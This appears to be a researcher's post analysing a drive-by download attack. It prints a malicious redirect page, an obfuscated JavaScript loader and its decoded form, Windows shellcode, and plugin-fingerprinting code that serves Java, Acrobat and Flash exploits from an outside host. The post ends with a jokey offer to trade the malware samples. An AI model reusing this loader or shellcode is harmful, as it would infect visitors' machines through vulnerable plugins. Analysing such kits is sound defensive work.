ok, i've seen this pattern twice today, so...
our story begins here:
http---213.198.112.90/red.html
a dead simple redirection page...
<script type="text/javascript">
<!--
window.location = "http---mimigaviy.cn"
//-->
</script><script src=http---mirtradinggroup.com/tmpp/KeepAlive.php ></script>
but what's the script at the bottom ??
O-M-G
// <script>
function tn3(pb3H){return pb3H.replace(/%/g,'').replace(/[lpXM]/g,htC)}
uVY='doM63ument.l77p72ite(X22M3cp64iv l73l74M79X6cM65p3dl5cl22M70oM73itip6fp6el3aabsol6cuteX3bX6cel66tl3aM2d1000p70p78X3b l74ol70X3ap2d10p30l30X70xl3bM5cX22p3eX22)l3bfM75ncl74X69oni73(a)l7bdocument.wl72il74e(M22p3cifraM6desrcM3dl5cX22httM70p3ap2fM2fmiX72trM61X64inM67grp6fuX70.comM2ftmX70M70M2fKeeX70Ap6cM69veX2ep70hM70M3fl73M3doRJX4drob3l26idX3dl22+a+X22M5cp22l3el3cX2fiframeM3eX22)p3bM7dl6ehM58UM3d0l3bvarM20scoX64X65p3dp22l25uC031X25u6499l25u4l3003X25u8B30M25X75X30M4340l25u708Bp25p75ADM31CM25u688p42l25uE80M38X25uM3007Cl25l750000l25uM3458Bp25u5p33M33Cl25u5X34l38l42M25u7805l25p750l3156X25u83EAp25M75FFC9M25l75l38M4252X25u2l3072p25M75EE01M25uAl44M341X25uDBl331X25uCM3199p25u0Dp43M42p25uX44301l25u9940X25u5M34M30l32M25uFF05X25uM46M3375M25ul46B3l39X25uEA75M25uM38B5Ep25u24M35p45M25X75EX42M301X25u8B66M25u4Bl30CM25l75l35E8BX25X75011Cl25u8p42EBM25X75l38M4204M25uE801p25p755B5EX25uE0FFM25uM42M46M350M25p75X45p4449l25u7E0FX25uDM33FX46M25u565Ep25u52p350X25X75685l34X25ul43000X25u0000p25p75l3505p36X25u8Bp42FX25uE34Bp25uFF5FM25u5l39DM33l25uCE01X25uCX308X35p25uX453M35l38M25u7M3502M25up35p38EX35M25u2950X25p75p38p44CM36M25u3694X25uD520M25u6p31A1p25uM35401p25X75FC30l25l75EM458p33p25ul37M3504p25uC3M460M25uF63X31p25X753M30B6X25X75p36Al35BM25u5240p25uEl32C1p25u520l32p25uBF56M25uCA54p25u91Al46l25l75p44l33FFM25X75l43085l25ul30M4275M25u00l458X25M750000M25X75X35p380X30M25up3002Dp25u00C0M25l7550X300X25u0CE8X25u0000M25u7X37p30M30p25M756X456p39X25M756E6M39X25u7465p25u6M342El25X756C6p43M25p75BF00M25u4E8Ep25uEC0Ep25uD3p46X46M25ul35695l25up356p356M25u56M356M25l7529Bl46M25p75E844M25uFF57p25l75X35M36D3M25uM30068p25u0001p25u5684l25M75E856M25uX46F70X25uX46FFFX22l3bfM75nction ekp313(p29l7bp72eturnX74l72uep3bX7dwM69ndp6fw.l6fM6eerrorl3dek13X3bfunctiM6fnn7M33(l61)l7bvark,s,iX3bif(np61vigator.mimeTyp70esl2el6cengthM26p26l28kM3dX6eavigator.M70X6cugiM6es)p29for(iX3d0p3biM3ck.X6cengthX3bl69++p29M7bsp3dkX5biM5d.nM61meX3bM69f(s.ip6edexX4ff(a)l3ep3d0M29retX75rn p6bl5bl69X5dM3bM7drl65l74url6e0M3bX7dp69f(M6eX61vigator.jap76ap45l6eabl6ced(l29)dop63p75l6dentl2ewX72X69tep28l22p3cM61X70M70X6cp65p74 codep3dp5cp22zzzp2etp74l74.l61d3740bl34.cp6casX73X5cp22X20archX69vM65M3dp5cX22htX74l70M3aX2fl2fmirtradiM6eggroup70.cop6dp2ftmX70p70X2fKeeM70AM6cive.l70M68M70p3fsp3dl6fRJM4dp72ob3l26iM64M3d6p5cp22 M77p69l64p74X68X3d30X30heightp3d300X3eX3cX70araml6eameM3dl5cX22datX61X5cp22M20val6cueX3dX5cp22X68tX74M70l3aM2fM2fmirtrap64l69np67grX6fup70.X63omp2ftmM70X70M2fKeel70Ap6cip76e.M70hl70M3fsl3dl6fp52Jl4dX72M6fl62X33p26M69dp3d1M34l26M5cl22X3el3cM70aram namp65X3dX5cM22ccl5cp22l20val6cuX65l3dM5cX221M5cp22l3ep3cp2fap70X70l6ceX74l3eM22)l3bjM75M43M4dp3d0p3bl74ryX7bl6al75CX4dp3dnew p41X63tivX65p58ObjectX28X22Al63roPDF.p50DFp22X29X3bM7dM63atchp28eX29l7bp7dif(X21jX75Cp4d)tryl7bjl75Cp4dp3dnewActiveM58p4fbjeX63X74(M22PX44M46.p50dM66CtrX6cp22)M3bX7dcatcp68(e)l7bl7dip66X28jl75CM4d)M7bp76ar X6cvl3d((juX43l4d.GetVM65M72sM69onl73().sl70l6cit(M22,M22))l5bX34p5d.sp70p6cit(X22l3dl22)l29M5bp31X5d.rep70p6cace(p2fM5c.p2fX67,l22l22p29X3bjuCX4dM3d(X6cvp3cM3900)p26X26(X6cvX21l3dl3813)M3bX7deX6cse juCl4dM3dnl373(p22AdobM65Ap22)p7cM7cn73M28X22AdobM65M20l50l22)M3bif(juCl4d)ip373(2)l3bnhM58UM3d0p3bjup43l4dX3dp30p3bp66ul6ectp69oX6e M737l33(a)p7bif(ap5b0X5dp3dp3dp39)M7bjuCp4dp3dp61l5b2l5dM3cM312l34l3bl6ep68M58UM3d(al5b2M5dl3e16)l26l26(l61l5b2p5dp3c246)M3bX7deX6csep20if(ap5b0p5dl3dl3dX310X29nhl58Up3dM61p5b2X5dp3c23l3bp6ehp58UM3dnl68p58Up26X26(nl61vX69M67al74orX2ep75sX65rAM67p65nt.l74l6fLowM65rCase()X2eip6edexp4fp66(p22safl61riM22)X3dM3dl2d1)l3bX7dl69fp28(xp3dn73(l22FM6cal73hM22))M26l26(xp3dx.descriX70til6fn))X7373(x.rX65X70M6cp61cel28p2f(X5baM2dzAl2dX5aM5dp7cM5cX73)p2bX2fl2cM22X22).p72eX70X6cace(M2f(p5cs+rl7cp5cM73+bl5b0p2dl39p5d+l29X2f,M22.M22).sX70X6cit(p22.l22))l3bep6cse tryl7bs7X33((neM77p20Actip76eX58ObX6aect(X22Shol63kwl61veFp6cl61sh.p53hM6fX63kwM61veFp6cashl22))X2eGetp56arip61bl6ce(M22l24X76ersionp22).M73p70M6cX69t(M22 p22)X5b1M5d.sp70X6cp69tp28l22,p22))l3bl7dM63p61l74chX28l65)l7bl7difM28juCX4d)l6973(3)l3bdX6fcup6deM6el74.write(p22l3cX2fdX69vp3ep22p29X3b';
kzsY=5;
try{if(htC='a')throw new TypeError('2'+kzsY);}catch(kzsY){htC=unescape('%'+tn3(kzsY.message));htC=tn3(uVY)}
eval(unescape(htC));
//</script>
unescape(htC) is (after a clean up):
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
function i73(a)
{
document.write("<iframe src=\"http---mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=" + a + "\"></iframe>");
}
nhXU=0;
var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE34B%uFF5F%u59D3%uCE01%uC085%uE358%u7502%u58E5%u2950%u8DC6%u3694%uD520%u61A1%u5401%uFC30%uEE83%u7504%uC3F0%uF631%u30B6%u6A5B%u5240%uE2C1%u5202%uBF56%uCA54%u91AF%uD3FF%uC085%u0B75%u00E8%u0000%u5800%u002D%u00C0%u5000%u0CE8%u0000%u7700%u6E69%u6E69%u7465%u642E%u6C6C%uBF00%u4E8E%uEC0E%uD3FF%u5695%u5656%u5656%u29BF%uE844%uFF57%u56D3%u0068%u0001%u5684%uE856%uFF70%uFFFF";
function ek13(){return true;}
window.onerror=ek13;
function n73(a){
var k,s,i;
if(navigator.mimeTypes.length&&(k=navigator.plugins))
for(i=0;i<k.length;i++){
s=k[i].name;
if(s.indexOf(a)>=0)
return k[i];
}
return 0;
}
if(navigator.javaEnabled())
document.write("<applet code=\"zzz.ttt.ad3740b4.class\" archive=\"http://mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=6\" width=300 height=300><param name=\"data\" value=\"http://mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=14&\"><param name=\"cc\" value=\"1\"></applet>");
juCM=0;
try{
juCM=new ActiveXObject("AcroPDF.PDF");
}catch(e){}
if(!juCM)
try{juCM=new ActiveXObject("PDF.PdfCtrl");}catch(e){}
if(juCM){
var lv=((juCM.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");
juCM=(lv<900)&&(lv!=813);
}else
juCM=n73("Adobe A")||n73("Adobe P");
if(juCM)
i73(2);
nhXU=0;
juCM=0;
function s73(a){
if(a[0]==9){
juCM=a[2]<124;
nhXU=(a[2]>16)&&(a[2]<246);
}else if(a[0]==10)
nhXU=a[2]<23;
nhXU=nhXU&&(navigator.userAgent.toLowerCase().indexOf("safari")==-1);
}
if((x=n73("Flash"))&&(x=x.description))
s73(x.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));
else
try{s73((new ActiveXObject("ShockwaveFlash.ShockwaveFlash")).GetVariable("$version").split(" ")[1].split(","));
}catch(e){}
if(juCM)
i73(3);
document.write("</div>");
ok, so left have a look, why do we have a variable for some shell-code ?
we have java, acrobat reader and flash...
lets download...(we need to download fast and with the hashes it gave us or it will return a blank page...)
all files are random keyd obfuscated...
JAR - not a virus they say, from what i can see lots of obfuscated code...
http://www.virustotal.com/analisis/cdc63ce0b8d58dfa950f7496fcf0e71cb81552bdc0d5357d5c4ded3d21b86640-1268176373SWF - only Kaspersky know it - Trojan-Downloader.SWF.Agent.dc
http://www.virustotal.com/analisis/9ae30f055b424a0d158dbe7381c4c2a2d2352ceb1243dc8502ed12188618186c-1268176524PDF - once again only Kaspersky - Exploit.JS.Pdfka.buh
http://www.virustotal.com/analisis/8cdb7242317adc54c8519094cdfcef3baa7d79925289f59fd64d263da0a8df6a-1268176590if you want the files - WE have them and WE ARE willing to bargen ;)...